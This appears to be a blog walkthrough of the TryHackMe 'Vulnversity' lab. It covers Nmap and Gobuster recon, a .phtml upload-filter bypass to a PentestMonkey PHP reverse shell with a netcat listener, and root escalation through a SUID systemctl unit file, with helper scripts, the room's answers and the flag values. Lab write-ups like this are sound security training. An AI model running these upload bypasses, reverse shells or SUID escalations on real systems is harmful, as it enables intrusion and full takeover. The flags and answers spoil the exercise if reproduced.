Vulnversity — Walkthrough Tryhackme

Introduction

"Vulnversity" is an introductory-level room on TryHackMe that walks through the basic penetration testing methodology and tooling: scanning, enumeration, exploitation (a file-upload bypass to a reverse shell) and post-exploitation (privilege escalation through a SUID binary).

Task 1: Deploy the Machine


  • Deploy the virtual machine provided in the room and note the IP address assigned


Task 2: Reconnaissance


Use Nmap to scan the target machine. A basic scan with default scripts (-sC) and version detection (-sV):

nmap -sC -sV 10.10.25.81

The scan shows six open ports: 21 (FTP), 22 (SSH), 139 and 445 (SMB), 3128 (Squid proxy) and 3333 (HTTP).

The SSH and Apache banners identify the OS as Ubuntu, and the web server is running on port 3333 (port 3128 is the Squid proxy, not the web server).


Scan the box, how many ports are open?

Ans. 6

What version of the squid proxy is running on the machine?

Ans. 3.5.12

What is the most likely operating system this machine is running?

Ans. Ubuntu

What port is the web server running on?

Ans. 3333

It is essential to do your reconnaissance thoroughly before moving on. Every open service is a potential point of entry, and services on high port numbers are easy to miss: a default Nmap scan covers only the 1000 most common ports, so also scan the full range (nmap -p- scans all 65535 TCP ports and can be left running in the background while you work on what you have already found).

Ans. No answer needed

What is the flag for enabling verbose mode using Nmap?

Ans. -v
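As an added example that is not part of the original write-up: the Task 2 answers pulled out of a saved Nmap report with awk instead of read by eye. The report text below is constructed to match the results this walkthrough describes (six open ports, Squid 3.5.12, Ubuntu, web server on 3333); the individual banners are assumptions, so save your own scan with -oN and point the functions at that file instead.

```shell
#!/usr/bin/env bash
# Added example: answer the Task 2 questions from a saved "nmap -sC -sV -oN" report.
# The report below is CONSTRUCTED to match what the walkthrough describes; the
# exact banners are assumptions, not the real room output.

SCAN_FILE="${TMPDIR:-/tmp}/vulnversity-scan.txt"
cat > "$SCAN_FILE" <<'EOF'
Nmap scan report for 10.10.25.81
Host is up (0.045s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
EOF

# count_open_ports FILE -> number of port lines whose STATE column is "open"
count_open_ports() {
  awk '$1 ~ "^[0-9]+/(tcp|udp)$" && $2 == "open" { n++ } END { print n + 0 }' "$1"
}

# service_version FILE PATTERN -> first dotted version number on the first open
# port line that mentions PATTERN (case-insensitive), e.g. squid -> 3.5.12
service_version() {
  awk -v pat="$2" 'tolower($0) ~ tolower(pat) && $2 == "open" {
      if (match($0, /[0-9]+(\.[0-9]+)+/)) { print substr($0, RSTART, RLENGTH); exit }
  }' "$1"
}

# web_port FILE -> port of the first open service nmap labels plain "http"
# ("http-proxy" on 3128 deliberately does not count as the web server)
web_port() {
  awk '$2 == "open" && $3 == "http" { split($1, p, "/"); print p[1]; exit }' "$1"
}

# os_guess FILE -> most frequently mentioned OS name across all banners
os_guess() {
  grep -oiE 'ubuntu|debian|centos|windows|freebsd' "$1" \
    | tr 'A-Z' 'a-z' | sort | uniq -c | sort -rn | awk 'NR == 1 { print $2 }'
}

# ports_above FILE N -> open ports numbered above N, one per line
# (the ones a default top-1000 scan is most likely to miss)
ports_above() {
  awk -v n="$2" '$2 == "open" { split($1, p, "/"); if (p[1] + 0 > n + 0) print p[1] }' "$1"
}

printf 'open ports:    %s\n' "$(count_open_ports "$SCAN_FILE")"
printf 'squid version: %s\n' "$(service_version "$SCAN_FILE" squid)"
printf 'os guess:      %s\n' "$(os_guess "$SCAN_FILE")"
printf 'web port:      %s\n' "$(web_port "$SCAN_FILE")"
printf 'ports > 1000:  %s\n' "$(ports_above "$SCAN_FILE" 1000 | tr '\n' ' ')"
```

The version regex requires at least one dot, so "3128/tcp" at the start of the Squid line is skipped and "3.5.12" is what comes back; it is a convenience for reading reports, not a substitute for checking the banner yourself when a version decides whether an exploit applies.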

Task 3: Locating directories using Gobuster

Gobuster is a penetration testing tool that brute-forces hidden directories and files on web servers using a wordlist. It can also brute-force DNS subdomains (gobuster dns) and virtual host names (gobuster vhost).

Commonly used flags for gobuster dir include:

  • -u or --url: the target URL to scan.
  • -w or --wordlist: the wordlist used to brute-force directory and file names.
  • -s or --status-codes: the response status codes that count as a hit (use --wildcard to keep going when every request returns the same code).
  • -e or --expanded: print the full URL of each hit instead of just the path.
  • -x or --extensions: file extensions to try for every word in the wordlist (for example -x php,txt).
  • -r or --follow-redirect: follow HTTP redirects.
  • -k or --no-tls-validation: skip TLS certificate verification on HTTPS targets.
  • -t or --threads: number of concurrent threads.
  • -o or --output: file to write the results to.
  • -h or --help: show the help text.

To get started, you will need a wordlist for Gobuster (which it will work through quickly to identify whether a public directory exists). If you are using Kali Linux, you can find many wordlists under /usr/share/wordlists. You can also use the directory wordlist located at /usr/share/wordlists/dirbuster/directory-list-1.0.txt in the AttackBox. The web server on port 3333 is plain HTTP, so the URL uses http://, not https://.

gobuster dir -u http://10.10.25.81:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We discover an /internal directory and further investigation reveals an /internal/uploads directory.

What is the directory that has an upload form page?

Ans. /internal/

Task 4: Compromise the webserver

We try to upload a PHP reverse shell, but the .php extension is filtered.

Start Burp Suite and route the browser through it with FoxyProxy. Capture the upload request, send it to Intruder, and mark the file extension in the request as the payload position (Sniper attack type). Load a simple list of PHP-family extensions (.php, .php3, .php4, .php5, .phtml and so on) as the payload.

Start the attack and compare the responses. Every extension returns status 200, but the response length for .phtml differs from the rest: the filter rejected the others and accepted .phtml.

Download the PentestMonkey PHP reverse shell, set its $ip to your attacker address and $port to 1234, save it as php-reverse-shell.phtml, and start a Netcat listener:

nc -lvnp 1234

Upload the file through the form at /internal/, then browse to http://10.10.25.81:3333/internal/uploads/php-reverse-shell.phtml. Apache executes the .phtml file as PHP and the shell connects back to the listener.

What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.

Ans. .php

I understand the Burp Suite tool and its purpose during pentesting.

Ans. No answer needed

What extension is allowed after running the above exercise?

Ans. .phtml

While completing the above exercise, I have successfully downloaded the PHP reverse shell.

Ans. No answer needed
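As an added example that is not from the room or the original write-up: a small shell model of why .phtml gets through. The upload filter below is an assumption reconstructed from the two facts the room gives us (.php is rejected, .phtml is accepted); the handler regex is the one Ubuntu's libapache2-mod-php package ships in /etc/apache2/mods-available/php*.conf, which is what decides whether Apache actually executes an uploaded file as PHP. The block also writes the extension list used as the Intruder payload, and shows the allow-list check the server should have used.

```shell
#!/usr/bin/env bash
# Added example: deny-list upload filter (ASSUMED, modelled on the room) versus
# what Apache's mod-php on Ubuntu will execute, and the Intruder payload list.

# Extensions worth trying as the Sniper payload (simple list).
CANDIDATE_EXTENSIONS=".php .php3 .php4 .php5 .php7 .phps .phtml .phar .phpt .inc .html .txt"

# Assumed server-side deny-list. The room only tells us .php is blocked and
# .phtml is not; the rest of this list is a guess for illustration.
UPLOAD_BLOCKLIST=".php .php3 .php4 .php5 .php7 .phps .phpt"

# Ubuntu libapache2-mod-php default:
#   <FilesMatch ".+\.ph(ar|p|tml)$"> SetHandler application/x-httpd-php
PHP_HANDLER_RE='.+\.ph(ar|p|tml)$'

# upload_filter_accepts FILENAME -> 0 if the (assumed) deny-list lets it through
upload_filter_accepts() {
  ext=".${1##*.}"
  for blocked in $UPLOAD_BLOCKLIST; do
    if [ "$ext" = "$blocked" ]; then return 1; fi
  done
  return 0
}

# apache_executes_as_php FILENAME -> 0 if mod-php's FilesMatch would run it
apache_executes_as_php() {
  printf '%s\n' "$1" | grep -Eq "$PHP_HANDLER_RE"
}

# bypass_extensions -> candidates that pass the filter AND are executed as PHP
bypass_extensions() {
  for ext in $CANDIDATE_EXTENSIONS; do
    f="php-reverse-shell$ext"
    if upload_filter_accepts "$f" && apache_executes_as_php "$f"; then
      printf '%s\n' "$ext"
    fi
  done
}

# hardened_filter_accepts FILENAME -> allow-list instead of deny-list:
# only image extensions, and exactly one dot in the name
hardened_filter_accepts() {
  case "$1" in
    *.*.*) return 1 ;;
    *.jpg|*.jpeg|*.png|*.gif) return 0 ;;
    *) return 1 ;;
  esac
}

# write_intruder_payloads FILE -> one extension per line for Burp's simple list
write_intruder_payloads() {
  printf '%s\n' $CANDIDATE_EXTENSIONS > "$1"
}

write_intruder_payloads "${TMPDIR:-/tmp}/php-extensions.txt"
printf 'Extensions that pass the filter and run as PHP: %s\n' "$(bypass_extensions | tr '\n' ' ')"
```

The filter side is the guess; the handler side is real, which is the point: a deny-list of .php variants is never complete, because anything matching .ph(ar|p|tml) that slips past it is executed. In the room, confirm the accepted set with Intruder as described above rather than trusting this model; the hardened_filter_accepts variant shows the allow-list approach that would have closed the hole regardless of which PHP extension the attacker tries.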

What is the name of the user who manages the webserver?

Ans. bill

bash -i              # get an interactive bash from the bare reverse shell
cd /home
ls                   # the only home directory is bill's
cd bill
ls
cat user.txt

What is the user flag?

Ans. 8bd7992fbe8a6ad22a63361004cfcedb

Task 5: Privilege Escalation

With the reverse shell in place, you need to escalate your privileges to gain full control of the machine. Check for any sudo privileges or SUID binaries that might be exploitable:

find / -perm -u=s -type f 2>/dev/null        


We notice that /bin/systemctl is a SUID binary, which we can leverage to obtain elevated privileges. Let's refer to GTFOBins and search for systemctl.

Reference: https://gtfobins.github.io/gtfobins/systemctl/

Because systemctl is SUID root, it can register and start units with the system manager, and systemd runs a unit's ExecStart as root. We create a temporary service whose ExecStart copies root.txt to a location our low-privileged user can read:

TF=$(mktemp).service                     # throw-away unit file name
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF                  # register the unit with systemd
/bin/systemctl enable --now $TF          # start it: ExecStart runs as root
cat /tmp/output                          # root.txt, now readable by us

On the system, search for all SUID files. Which file stands out?

Ans. /bin/systemctl

What is the root flag value?

Ans. a58ff8579f0a9270368d33a9966c7fd5
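As an added example (mine, not the room's or GTFOBins' code): a triage pass over the SUID listing that picks out the binary worth a GTFOBins lookup, and a generator for the unit file used above. The SUID listing and the "stock Ubuntu 16.04" set below are constructed for the example; the GTFOBins list is a hand-picked subset of binaries GTFOBins marks as abusable when SUID, not the full catalogue.

```shell
#!/usr/bin/env bash
# Added example: triage "find / -perm -u=s -type f" output against a baseline,
# then build the unit file for the systemctl escalation. Sample data is CONSTRUCTED.

# Stand-in for the live find output (constructed).
SUID_SAMPLE="/bin/mount
/bin/ping
/bin/su
/bin/systemctl
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign"

# Binaries that are SUID on a stock Ubuntu 16.04 install (assumption; compare
# against a clean box of the same release on a real engagement).
EXPECTED_SUID="/bin/mount /bin/umount /bin/ping /bin/ping6 /bin/su /bin/fusermount
/usr/bin/passwd /usr/bin/sudo /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd
/usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper"

# Subset of binaries GTFOBins lists with a SUID section (file read or shell).
GTFOBINS_SUID="systemctl find vim vi nano python python3 perl bash env less more cp mv awk tar zip"

# is_expected_suid PATH -> 0 if PATH is in the stock list
is_expected_suid() {
  for e in $EXPECTED_SUID; do
    if [ "$1" = "$e" ]; then return 0; fi
  done
  return 1
}

# is_gtfobins_suid PATH -> 0 if PATH's basename is on the GTFOBins subset
is_gtfobins_suid() {
  base="${1##*/}"
  for g in $GTFOBINS_SUID; do
    if [ "$base" = "$g" ]; then return 0; fi
  done
  return 1
}

# unexpected_suid: stdin paths -> those not in the stock list
unexpected_suid() {
  while IFS= read -r path; do
    if [ -n "$path" ] && ! is_expected_suid "$path"; then printf '%s\n' "$path"; fi
  done
}

# gtfobins_hits: stdin paths -> those GTFOBins knows how to abuse
gtfobins_hits() {
  while IFS= read -r path; do
    if [ -n "$path" ] && is_gtfobins_suid "$path"; then printf '%s\n' "$path"; fi
  done
}

# triage_suid -> candidates from the constructed sample
triage_suid() {
  printf '%s\n' "$SUID_SAMPLE" | unexpected_suid | gtfobins_hits
}

# live_triage -> the same pipeline over the real filesystem (not run here)
live_triage() {
  find / -perm -4000 -type f 2>/dev/null | unexpected_suid | gtfobins_hits
}

# make_unit CMD OUTFILE UNITFILE -> writes a oneshot unit whose ExecStart runs CMD
# as root and redirects its output to OUTFILE (Type=oneshot so it runs once and exits)
make_unit() {
  cat > "$3" <<EOF
[Service]
Type=oneshot
ExecStart=/bin/sh -c "$1 > $2"
[Install]
WantedBy=multi-user.target
EOF
}

UNIT="${TMPDIR:-/tmp}/vulnversity-demo.service"
make_unit 'cat /root/root.txt' /tmp/output "$UNIT"
printf 'SUID candidates worth a GTFOBins lookup: %s\n' "$(triage_suid | tr '\n' ' ')"
printf 'unit written to %s (link + enable --now with the SUID systemctl to run it)\n' "$UNIT"
```

Two practical notes. The baseline comparison is what makes /bin/systemctl stand out; on a box with dozens of SUID files, checking each against GTFOBins by hand is slow, and a stock-set diff narrows it to the additions. And the escalation leaves traces: link and enable --now drop a symlink under /etc/systemd/system, and /tmp/output is created by root and world-readable, so disable the unit and remove both when you are done. The same ExecStart can run any command as root, so reading the flag is the least of what a SUID systemctl gives away.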

Thank you very much for reading. I hope this is helpful to you. If you have any suggestions or something to add, feel free to contact me anytime.


Happy Hacking!

Santosh Kumar

Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researcher || TryHackMe Top 1% || Programming C, Python || Bug Bounty ||
